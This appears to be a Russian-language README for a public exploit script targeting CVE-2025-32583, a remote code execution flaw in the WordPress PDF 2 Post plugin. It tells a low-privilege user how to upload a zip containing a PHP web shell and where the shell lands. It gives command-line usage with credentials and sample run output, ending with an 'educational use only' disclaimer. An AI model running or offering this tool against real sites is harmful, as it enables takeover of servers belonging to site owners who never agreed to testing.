
Плагин WordPress PDF 2 Post <= 2.4.0 уязвим к удалённому выполнению кода (RCE) +Подписчик
КРИТИЧЕСКАЯ уязвимость
CVE-ID: CVE-2025-32583
Критичность: 9.9 (КРИТИЧЕСКАЯ)
CVSS-вектор:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Уязвимость в плагине PDF 2 Post для WordPress (разработанном termel) позволяет выполнить удалённое включение кода (RCE) из-за некорректного контроля генерации кода.
Затронутые версии: <= 2.4.0
Этот дефект позволяет аутентифицированным пользователям (даже с низкими привилегиями) загружать .zip-архив, содержащий PHP-код. После извлечения плагином вредоносный PHP-файл может быть удалённо выполнен через публично доступный каталог загрузок.
Nxploited.zipnonce-токенПосле загрузки полезной нагрузки PHP-шелл будет извлечён в папку загрузок WordPress.
🛠️ Путь по умолчанию:
/wp-content/uploads/YYYY/MM/nxploited.php
Например, при эксплуатации в мае 2025 года URL будет таким:
http://target-site.com/wp-content/uploads/2025/05/nxploited.php
🕓 WordPress автоматически сортирует загрузки по году/месяцу, поэтому убедитесь, что вы проверяете правильную папку в зависимости от текущей даты.
python CVE-2025-32583.py --help
python CVE-2025-32583.py -u http://target-site.com/wordpress -un admin -p admin
Exploit By: Khaled_alenazi (Nxploited)
[+] Payload Nxploited.zip created successfully.
[+] Logged in successfully.
[+] Found nonce: 3c3e8fff7c
[+] Payload uploaded.
CVE-2025-32583.py
Этот инструмент предназначен строго для образовательных целей и авторизованного тестирования на проникновение.
Любое неправомерное использование этого кода в несанкционированных целях строго запрещено.
Автор не несёт ответственности за любой ущерб или неправомерное использование.
Автор: Khaled_alenazi (Nxploited)